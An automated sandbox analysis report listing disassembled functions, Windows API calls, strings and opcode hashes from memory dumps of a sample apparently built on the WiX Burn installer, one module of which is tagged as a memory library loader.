Instruction ID: 94203648565c8885671975a59f58efbb308bef1eaec463c1491091cc0f1297b7
Opcode Fuzzy Hash: c66a2e5fe7fcf763f5e6b51422d9c6cea1341d9d41a139f28ffbb059d3b296ca
Instruction Fuzzy Hash: C801A237941A3AB7DB215AA69C08A8BBF28FF40771B118125FD28AB151DB319C10DAD8

Function 005307B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0055B478,00000000,?,00531717,?,00000000,?,0051C287,?,00515405,?,005275A5,?,?,00515405,?), ref: 005307BF
GetLastError.KERNEL32(?,00531717,?,00000000,?,0051C287,?,00515405,?,005275A5,?,?,00515405,?,00515445,00000001), ref: 005307C9

Strings

cabextract.cpp, xrefs: 005307ED
Failed to set begin operation event., xrefs: 005307F7

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: f609cc4b32aa37ec37b33bc410bb8418bc7863e0dd2984506b8cabfd7cbb911e
Instruction ID: 63629806bdfd28b3a0cad1ab7b37d815d1dffa7272e95faed523dc332c3890cc
Opcode Fuzzy Hash: f609cc4b32aa37ec37b33bc410bb8418bc7863e0dd2984506b8cabfd7cbb911e
Instruction Fuzzy Hash: EBF0EC3754273177972416955D1DACFBF84BF04B71F110125FE05B71C0E610AC00D6E5

Function 10010024 Relevance: 6.0, APIs: 4, Instructions: 26memorylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 10010036
Sleep.KERNELBASE ref: 10010048
GetProcessHeap.KERNEL32 ref: 10010057
HeapAlloc.KERNEL32 ref: 1001006C
GetProcAddress.KERNEL32 ref: 100100A0
GetProcAddress.KERNEL32 ref: 10010191
CreateProcessW.KERNELBASE ref: 100101DD

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: AddressHeapProcProcess$AllocCreateHandleModuleSleep
String ID:
API String ID: 89199105-0
Opcode ID: 950a509750ffc8f1610e82142d687e4c9373de8a157bcb66bc9af9c67793b6b5
Instruction ID: 2040b18ac1b8698d3e43ff7847e458a2a820da83c004affbb0587afc889ed5cb
Opcode Fuzzy Hash: 950a509750ffc8f1610e82142d687e4c9373de8a157bcb66bc9af9c67793b6b5
Instruction Fuzzy Hash: E5F05EB09042128FF300BF78C98861A3FF4FB45340F418528E88583214EF3894C58B92

Function 00515123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00511104,?,?,00000000), ref: 00515142
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00511104,?,?,00000000), ref: 00515172

Strings

burn.clean.room, xrefs: 0051512F, 0051513C, 00515169

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 3b5a6bcfa03824b73df8e741fb39a853d6ccec57a2641138326a6dd938d7a11c
Instruction ID: 439dabea51ce9755704774de9c74fb0ed87e212e79040ac049e0c8feaa04248d
Opcode Fuzzy Hash: 3b5a6bcfa03824b73df8e741fb39a853d6ccec57a2641138326a6dd938d7a11c
Instruction Fuzzy Hash: 7E01D672640624BFA3314B59AC98EB7BFACF7A5761B104116F849C3610E3709CC4E7A1

Function 1001008A Relevance: 4.6, APIs: 3, Instructions: 86libraryloaderprocessCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 100100A0
GetProcAddress.KERNEL32 ref: 10010191
CreateProcessW.KERNELBASE ref: 100101DD

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: AddressProc$CreateProcess
String ID:
API String ID: 4077384215-0
Opcode ID: ad70e93e966d263fbbf2108cb8d60dcfe2034383debb7e0f596ecb1c8346d2fb
Instruction ID: 905d80d8a206a4052b8d1577da9d97e865a115dd17d5b9b0c998d49a54522880
Opcode Fuzzy Hash: ad70e93e966d263fbbf2108cb8d60dcfe2034383debb7e0f596ecb1c8346d2fb
Instruction Fuzzy Hash: 3541F570908381DAE721DF28C59435BBFF0BF96308F45894DE5C48B291D7BA9598CB93

Function 00513838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00513877
GetLastError.KERNEL32 ref: 00513881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 005138EA

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 87612bad12fb4d03acb4618e15b6b6b4b0aad54804bfa13407a1fa3107bd71bd
Instruction ID: 1ba8668500764293f79b4ee494fb4339a646effc97a77989cd347fd8cf3414f6
Opcode Fuzzy Hash: 87612bad12fb4d03acb4618e15b6b6b4b0aad54804bfa13407a1fa3107bd71bd
Instruction Fuzzy Hash: EF21D6B2D0132DA7EB209F659C59FDA7FACBB44710F1105A1BD18E7241EA70DE8487D0

Function 00513A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00513BB6,00000000,?,00511474,00000000,7694B390,00000000,7694B390,00000000,?,?,005113B8), ref: 00513A20
RtlFreeHeap.NTDLL(00000000,?,00513BB6,00000000,?,00511474,00000000,7694B390,00000000,7694B390,00000000,?,?,005113B8,?,00000100), ref: 00513A27
GetLastError.KERNEL32(?,00513BB6,00000000,?,00511474,00000000,7694B390,00000000,7694B390,00000000,?,?,005113B8,?,00000100,?), ref: 00513A31

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 7d6bc6bc5902aa4bb45bc2fd0c6f4c39759aabc136216e781f8640b75e243ca5
Instruction ID: d6378aefc7527d31bfdfb56dee75a607859afea7ab5a3e653c1c658bfdaed2b3
Opcode Fuzzy Hash: 7d6bc6bc5902aa4bb45bc2fd0c6f4c39759aabc136216e781f8640b75e243ca5
Instruction Fuzzy Hash: 04D01273A046399797211BE69C6C99B7E58EF14AB2B050121FD44D6260D725CD40E6E4

Function 0051F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00550F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0057AAA0,00000000,?,005557E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00550F80

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00527D59,?,?,?), ref: 0051F7B9

Part of subcall function 00551026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,0051F78E,00000000,Installed,00000000,?), ref: 0055104B

Strings

Installed, xrefs: 0051F781

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: 812c8ed42efc9b1db4c757ff49f313595e11fe70b1b88b77438b0dd280460e61
Instruction ID: f472948e97c087e650662494e01ef0b4781375bf7281a275d013bd4d3b0ac3ea
Opcode Fuzzy Hash: 812c8ed42efc9b1db4c757ff49f313595e11fe70b1b88b77438b0dd280460e61
Instruction Fuzzy Hash: 5D014F36920228EBDB11DB94C84ABDEBFB8FF04721F1541A5E800AB1A0D7769E94D790

Function 00550F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0057AAA0,00000000,?,005557E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00550F80

Strings

regutil.cpp, xrefs: 00550FC3

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 7ee9a3ee0583ea68cd6b77215086317da4c5eccae9170089f4a05ea8202eec7a
Instruction ID: 8d8839db6465390b21b1c23a755f3e10364ed90ba40acdc2a838d093118eedd9
Opcode Fuzzy Hash: 7ee9a3ee0583ea68cd6b77215086317da4c5eccae9170089f4a05ea8202eec7a
Instruction Fuzzy Hash: 38F02B33601132779F3015569C26BABBE49FF947B2F155527BD4A9F2D0E6218C04A6F0

Function 0051394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00512274,?,00000001,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513960
RtlAllocateHeap.NTDLL(00000000,?,00512274,?,00000001,7694B390,8000FFFF,?,?,00550267,?,?,00000000,00000000,8000FFFF), ref: 00513967

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: e94abe486b2c4ae7d21839522901df2cb2ce50b41f3ee8d5f1a96245f05f7854
Instruction ID: 73bc5406f876b03be2212221ed3ce77e673bcb22a083fbfd70c6282eb9ba1070
Opcode Fuzzy Hash: e94abe486b2c4ae7d21839522901df2cb2ce50b41f3ee8d5f1a96245f05f7854
Instruction Fuzzy Hash: B5C012321A470CAB8B406FF8EC2EC9A3BACBB28603B048400B905C2160C738E118EB60

Function 100101EA Relevance: 3.0, APIs: 2, Instructions: 10libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 100101EE
ExitProcess.KERNEL32 ref: 1001020E

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: AddressExitProcProcess
String ID:
API String ID: 2796388413-0
Opcode ID: ab77cb24c1db182cc5b4928a80be7f58cc3f0ff1ec30169333ec9758b075fb51
Instruction ID: b844700c5a2f163abeb807b0b02adc6691dac62e2674852d0bae511e25b11171
Opcode Fuzzy Hash: ab77cb24c1db182cc5b4928a80be7f58cc3f0ff1ec30169333ec9758b075fb51
Instruction Fuzzy Hash: 1AD092708193109BC3507F74894921DBEB0AF81221F40CB1DE4E456294D63884489B92

Function 005535C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005535F8

Part of subcall function 0055304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00553609,00000000,?,00000000), ref: 00553069
Part of subcall function 0055304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,0053C025,?,00515405,?,00000000,?), ref: 00553075

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: ErrorHandleInitLastModuleVariant
String ID:
API String ID: 52713655-0
Opcode ID: 677433b2683f658cbecbe8d6e1666d62fe1e905ad1b90d531724880c4cbeda2d
Instruction ID: 223f22a5a2a1160f9aea4955358ae19ba3b955a7e53b19213bf03b3124eb6e31
Opcode Fuzzy Hash: 677433b2683f658cbecbe8d6e1666d62fe1e905ad1b90d531724880c4cbeda2d
Instruction Fuzzy Hash: 60314F76D00229ABCB11DFA8C884ADEBBF4FF08751F01456AED05BB311E6319D048BA0

Function 00555870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80070490,00000000,80070490,0057AAA0,00000000,80070490,?,?,00528B19,WiX\Burn,PackageCache,00000000,0057AAA0,00000000,00000000,80070490), ref: 005558CA

Part of subcall function 005510B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0055112B
Part of subcall function 005510B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00551163

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: QueryValue$Close
String ID:
API String ID: 1979452859-0
Opcode ID: 50a0578118e75ec7ef5ca79b625d5e0f42f22bc7eb3f951416c04065e834ced9
Instruction ID: f8fa52766eaf5abca1b3495e61b8e47cdd53a8c08f0facbdd3df8e4bf11f0586
Opcode Fuzzy Hash: 50a0578118e75ec7ef5ca79b625d5e0f42f22bc7eb3f951416c04065e834ced9
Instruction Fuzzy Hash: 7F11A03680062AEF8B21AE94C9759AEBF68FF44322B35413BFD0167211E7314E64E6D1

Function 005134B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00528BD3,0000001C,80070490,00000000,00000000,80070490), ref: 005134D5

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: e49bf92f2eee6246b81f2b1f985b895bd0619e1d9faa62fbf82cbd3a9e4b812b
Instruction ID: f8aa146146e13eb73564a43a122db63eed04eed04026cac02e31d948e767e780
Opcode Fuzzy Hash: e49bf92f2eee6246b81f2b1f985b895bd0619e1d9faa62fbf82cbd3a9e4b812b
Instruction Fuzzy Hash: B5E0C2722002247BFB022EA15C0CCEB3F5CBF04350B008060BE00D2000E366D6D093F4

Function 1006DC87 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,100680F9,00000001,?,?,?,10068272,?,?,?,10082890,0000000C,1006832D), ref: 1006DC9C

Memory Dump Source

Source File: 00000002.00000002.2269393437.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2269379829.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269434913.0000000010078000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269452138.0000000010089000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269466175.000000001008A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2269480350.000000001008F000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_UolJwovI8c.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: fc978fbda1a174bbf3262c34ba6a706c683f864871c6bbd01d870b004c6ef7b0
Instruction ID: d87adf701f38c020ab9a076e757b9bfb89af85dbfe74647cd7b5c1d80ebb0683
Opcode Fuzzy Hash: fc978fbda1a174bbf3262c34ba6a706c683f864871c6bbd01d870b004c6ef7b0
Instruction Fuzzy Hash: 63D01732A9035E5AE701AB716D48B263AE8F784795F044436E90CC6150F674C581C680

Function 0054F479 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0054F491

Part of subcall function 0055998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00559A09
Part of subcall function 0055998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00559A1A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bc5103d5dbe919e5ea95986172e67059c1319e25c3904a8f6bc214184d204f98
Instruction ID: 3de69e9f6d8afead8050a4de8d54da29a06d899da74cda1b38814b24613da455
Opcode Fuzzy Hash: bc5103d5dbe919e5ea95986172e67059c1319e25c3904a8f6bc214184d204f98
Instruction Fuzzy Hash: 66B012BD2A9402BC360411643C1AC7B1D1CF3C1F23330C66FB804C0041AC400C042072

Function 0054F49A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0054F491

Part of subcall function 0055998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00559A09
Part of subcall function 0055998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00559A1A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f72923b5614fe6358c215889c27bb4731e5f80db947cd5737397fbade9b44c92
Instruction ID: 43f9539c2315d70fab28c1f8628b68c66a047c0d7685e737dd51608485b3ae8f
Opcode Fuzzy Hash: f72923b5614fe6358c215889c27bb4731e5f80db947cd5737397fbade9b44c92
Instruction Fuzzy Hash: E1B012B92A9402AD364451683D1BC7B1D5CF3C5F23330C56FB408C1041EC440C052132

Function 0054F4AA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0054F491

Part of subcall function 0055998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00559A09
Part of subcall function 0055998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00559A1A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: efb0c0498551b15267f50f2f001f98349d427e9129299c9238a2ce60c160c434
Instruction ID: 86d880f35bde33d1b3a075e067d617d16878460d633e3c0be08a34b0f2ff3749
Opcode Fuzzy Hash: efb0c0498551b15267f50f2f001f98349d427e9129299c9238a2ce60c160c434
Instruction Fuzzy Hash: 5DB012B92A9502AC364451683C1AC7B5D5CF3C5F23330C66FF408C1041EC400C442132

Function 00559653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0055966B

Part of subcall function 0055998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00559A09
Part of subcall function 0055998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00559A1A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268838692.000000000057D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_510000_UolJwovI8c.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 69facf53243764974afb5e6c64b120012d77b38d5fde285a98b9c2f043d54b08
Instruction ID: 077f1abf2ec81ea42a941eeae1468c3e98ef291a0d33caa3cac380b4e74b229b
Opcode Fuzzy Hash: 69facf53243764974afb5e6c64b120012d77b38d5fde285a98b9c2f043d54b08
Instruction Fuzzy Hash: E6B012952A8102FC3A441100BC9AC3B0D1CF7C0B13330C51FB804E0041A8440C0C2233

Function 00559674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0055966B

Part of subcall function 0055998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00559A09
Part of subcall function 0055998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00559A1A

Memory Dump Source

Source File: 00000002.00000002.2268773940.0000000000511000.00000020.00000001.01000000.00000005.sdmp, Offset: 00510000, based on PE: true

Associated: 00000002.00000002.2268758136.0000000000510000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268802426.000000000055B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2268823426.000000000057A000.00000004.00000001.01000000.00000005.sdmpDownload File
